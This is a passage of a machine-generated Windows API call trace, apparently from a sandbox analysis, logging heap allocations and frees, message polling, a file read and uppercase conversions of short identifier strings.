0x246d7e0 [0256.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0256.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0256.160] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0256.160] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x94b9, lpOverlapped=0x0) returned 1 [0256.162] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0256.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x94b9) returned 0x24c7a50 [0256.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0256.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0256.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x94b9) returned 0x24d0f18 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.164] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x94b9) returned 0x24c7a50 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.164] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0256.165] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.165] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0256.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x94b9) returned 0x24c7a50 [0256.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x94b9) returned 0x24da3e0 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0256.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.168] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.168] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0256.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.169] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.169] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.170] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.170] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.173] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.173] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, 